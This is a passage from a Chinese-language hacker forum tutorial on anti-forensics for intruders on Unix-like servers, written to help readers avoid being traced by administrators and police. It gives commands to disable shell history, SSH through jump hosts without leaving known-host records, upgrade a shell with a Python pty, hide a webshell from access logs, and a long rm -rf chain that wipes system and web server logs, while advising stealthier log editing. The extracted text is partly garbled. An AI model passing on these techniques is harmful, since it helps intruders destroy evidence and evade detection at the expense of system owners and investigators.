被警察叔叔请去喝茶时间很痛苦
事情
各位道长如果功力不够又喜欢出风头想必都有过这样“待遇”
如何使自己在系统中隐藏更深是我们必须掌握基本功当然如果管理员真想搞你而他功力又足够足话相信没什么人能够真正“踏雪无痕”Forensic 和Anti-Forensic说到底只是你和管理员的间技术间较量而已貌似很少有专门说这个文章大部分就是下载个日志擦除软件Software然后运行下就可以了对小站可以但对方如果是经验丰富管理员呢?我们该如何应对?我在这里只介绍unix-like system下至于windows或者其他什么系统下欢迎各位道友补充1.最小化你
日志P.S 访问目标前用跳板我就不废话了
你是VPN也好3389也罢ssh中转代理都行总的记住
点—直接连接攻击目标是愚蠢1.1shell使用问题
目前linux下大多数
shell都是采用bash或者其他什么shell 通过输入输出重定向来实现和服务器交互当我们使用ssh 或者telnet的类登录时候我们命令都会被记录在shell history文件下面举例来说bash会在当前目录下面.bash_history文件里记录下你此次登陆操作命令如果你拿这台机器当跳板话或者扫描其他机器你命令都会被记录下来哦呵呵所以我们登录第件事就是执行如下命令:引用
un
HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0当然区别
shell写法可能区别像有设置环境变量什么大家根据自己shell自行修改记住:从 webshell弹回shell也会记录你操作值得庆幸是现在很多弹shell脚本都预先un 环境变量我们还需要记住
是在登录时候出现在登录窗口些信息比如该用户在什么时候从哪个IP登录进来等等这在我们后面用于日志清除和修改时候要用到如图:
作为跳板
时候我们有可能需要用本机ssh去访问别机器但是别机器公钥呢?总不能放在当前用户目录下吧?当然你可以事后删除但多事不如少事你说对么?ssh -o UserKnownHostsFile=/dev/null -T user@host /bin/bash –i
就可以了
但在这样运行某些命令时候可能会有提示说你stdin不是个terminal这里可以这样解决:python -c 'import pty; pty.spawn("/bin/sh")'
或者自己再建立个ttyshell
1.2 webshell
选择问题可能各位道友
日常生活中最主要目标瞄向了webserver 现在web也是大多数入侵个突破口Linux下用最多就是apache服务器了当我们发觉个服务器漏洞时候很可能要上传个webshell来进行对服务器文件进步操作和信息搜集部分webshell也提供了反弹shell功能如何能够在apache服务器日志文件中留下最小记录也是需要深究这种情况通常发生在没能够获得足够权限来清除apache日志如果能够 root了则可以将重点放在第 2节日志清除上通常日志只记录GET信息比如你注入你采用了那种方式提交数据等等如果我们 webshell采用多是GET方式交互话就很容易在httpdaccess_log中留下很多日志这些以后都会被作为证据所采纳 Phpspy是个很好选择作者也注意掉了这点取消了GET方式交互再给webshell起个比较迷惑名字这样我们和webshell交流就更加隐秘2.日志
清除和改写日志清除和改写
俗称擦PP这是个很重要过程日志记录了你对目标机器操作记录大部分入侵者查找都是通过日志来确定因此我们需要对日志文件进行操作对日志操作有这么个说法能修改就不清除这样才能最小减少管理员怀疑Linux下大多数文件是以文本方式或者以简单结构体方式存入文件这就为我们修改某个日志记录里具体内容提供了前提条件需要注意
点是我们需要先看看日志存放位置有管理员会修改日志保存位置般来说我们可以查看 /etc/syslog.conf来获得log文件存放位置但要注意是有管理员(及其负责)会重新编译syslogd文件来重新指定log存放位置如何办?在这种情况下可以用
s来看下/sbin/syslogd这个文件这种管理员我只在书里看到过至少我没遇到过: P这个配置文件里面记录了系统存放某些log目录如secure文件等下面我们就会根据这个文件来清理和修改日志现在可以在网上公开获得
日志清除
代码很粗糙我曾经看到过最夸张清日志代码像这样:rm -rf /var/log/lastlog ; rm -rf /var/log/telnetd ; rm -rf /var/run/utmp ; rm -rf /var/log/secure ; rm -rf /root/.ksh_history ; rm -rf /root/.bash_history ; rm -rf /root/.bash_logut ; rm -rf /var/log/wtmp ; rm -rf /etc/wtmp ; rm -rf /var/run/utmp ; rm -rf /etc/utmp ; rm -rf /var/log ; rm -rf /var/adm ; rm -rf /var/apache/log ; rm -rf /var/apache/logs ; rm -rf /usr/local/apache/log ; rm -rf /usr/local/apache/logs ; rm -rf /var/log/acct ; rm -rf /var/log/xferlog ; rm -rf /var/log/messages ; rm -rf /var/log/proftpd/xferlog.legacy ; rm -rf /var/log/proftpd.access_log ; rm -rf /var/log/proftpd.xferlog ; rm -rf /var/log/httpd/error_log ; rm -rf /var/log/httpd/access_log ; rm -rf /etc/httpd/logs/access_log ; rm -rf /etc/httpd/logs/error_log ;rm -rf /var/log/
s/suck.notice ; rm -rf /var/spool/tmp ; rm -rf /var/spool/errors ; rm -rf /var/spool/logs ; rm -rf /var/spool/locks ; rm -rf /usr/local/www/logs/thttpd_log ; rm -rf /var/log/thttpd_log ; rm -rf /var/log/ncftpd/misclog.txt ; rm -rf /var/log/ncftpd.errs ; rm -rf /var/log/auth ; rm -rf /root/.bash_history ; touch /root/.bash_history ; history –r整个
rm集合要是服务器跑了很长时间积累了很多日志你这样删除你帮他省事了他也省事眼就看出有人进来了
最新评论